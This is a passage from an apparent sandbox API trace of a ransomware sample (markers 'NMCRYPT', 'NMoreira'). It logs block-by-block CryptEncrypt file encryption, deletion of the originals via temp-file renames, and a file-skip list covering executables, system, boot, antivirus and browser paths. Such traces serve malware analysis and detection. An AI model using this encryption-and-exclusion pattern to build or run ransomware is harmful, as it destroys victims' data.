nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.886] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.886] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.886] GetLastError () returned 0x0 [0166.886] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.886] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.886] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.886] GetLastError () returned 0x0 [0166.886] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.886] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.886] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.886] GetLastError () returned 0x0 [0166.886] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.886] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.886] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.886] GetLastError () returned 0x0 [0166.886] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.886] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.886] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.886] GetLastError () returned 0x0 [0166.886] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.886] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.887] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.887] GetLastError () returned 0x0 [0166.887] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.887] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.887] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.887] GetLastError () returned 0x0 [0166.887] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.887] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.887] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.887] GetLastError () returned 0x0 [0166.887] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.887] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.887] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.887] GetLastError () returned 0x0 [0166.887] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.887] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.887] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.887] GetLastError () returned 0x0 [0166.887] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.887] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.887] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.887] GetLastError () returned 0x0 [0166.887] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.887] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.887] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.887] GetLastError () returned 0x0 [0166.887] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.888] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.888] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.888] GetLastError () returned 0x0 [0166.888] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.888] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.888] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.888] GetLastError () returned 0x0 [0166.888] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.888] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x5b, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x5b, lpOverlapped=0x0) returned 1 [0166.888] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x5b, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x60) returned 1 [0166.888] GetLastError () returned 0x0 [0166.888] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x60, lpOverlapped=0x0) returned 1 [0166.888] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0166.888] WriteFile (in: hFile=0x15c4, lpBuffer=0x28828c0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0166.888] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc")) returned 0x20 [0166.888] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc", dwFileAttributes=0x20) returned 0 [0166.888] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 1 [0166.889] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc")) returned 0 [0166.889] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" [0166.889] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado") returned 1 [0166.889] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xXFF73.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xxff73.tmp")) returned 0xff73 [0166.890] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xXFF73.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xxff73.tmp"), dwFlags=0x1) returned 0 [0166.890] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xXFF73.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xxff73.tmp")) returned 1 [0166.890] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0166.890] wcslen (_String="OK") returned 0x2 [0166.890] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.890] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.890] CryptDestroyKey (hKey=0x9ad438) returned 1 [0166.890] CryptDestroyHash (hHash=0x9ad838) returned 1 [0166.890] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0166.890] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0166.890] wcscmp (_String1="en-US", _String2=".") returned 1 [0166.890] wcscmp (_String1="en-US", _String2="..") returned 1 [0166.891] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0166.891] PathMatchSpecW (pszFile="msader15.dll", pszSpec="*NMCRYPT") returned 0 [0166.891] PathMatchSpecW (pszFile="msader15.dll", pszSpec="*Recovers your files.html") returned 0 [0166.891] PathMatchSpecW (pszFile="msader15.dll", pszSpec="*.exe") returned 0 [0166.891] PathMatchSpecW (pszFile="msader15.dll", pszSpec="*.dll") returned 1 [0166.891] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0166.891] PathMatchSpecW (pszFile="msado15.dll", pszSpec="*NMCRYPT") returned 0 [0166.891] PathMatchSpecW (pszFile="msado15.dll", pszSpec="*Recovers your files.html") returned 0 [0166.891] PathMatchSpecW (pszFile="msado15.dll", pszSpec="*.exe") returned 0 [0166.891] PathMatchSpecW (pszFile="msado15.dll", pszSpec="*.dll") returned 1 [0166.891] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*NMCRYPT") returned 0 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*Recovers your files.html") returned 0 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*.exe") returned 0 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*.dll") returned 0 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*.lnk") returned 0 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*.bat") returned 0 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*.ini") returned 0 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*.msi") returned 0 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*.scf") returned 0 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*pagefile.sys*") returned 0 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*NTUSER.DAT*") returned 0 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*AppData*") returned 0 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*\\winrar\\*") returned 0 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*\\Internet Explorer\\*") returned 0 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*\\java\\*") returned 0 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*\\TeamViewer\\*") returned 0 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*\\windows\\*") returned 0 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*\\ESET\\*") returned 0 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*\\AVG\\*") returned 0 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*\\AVIRA\\*") returned 0 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*\\AVAST Software\\*") returned 0 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*Atheros*") returned 0 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*Realtek*") returned 0 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*bootmgr*") returned 0 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*boot*") returned 0 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*boot*") returned 0 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*CONFIG.SYS*") returned 0 [0166.891] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*IO.SYS*") returned 0 [0166.892] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*MSDOS.SYS*") returned 0 [0166.892] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*NTDETECT.COM*") returned 0 [0166.892] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*ntldr*") returned 0 [0166.892] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*chrome*") returned 0 [0166.892] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*opera*") returned 0 [0166.892] PathMatchSpecW (pszFile="msado20.tlb", pszSpec="*firefox*") returned 0 [0166.892] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb", pszSpec="*") returned 1 [0166.892] strlen (_Str="NMoreira") returned 0x8 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: 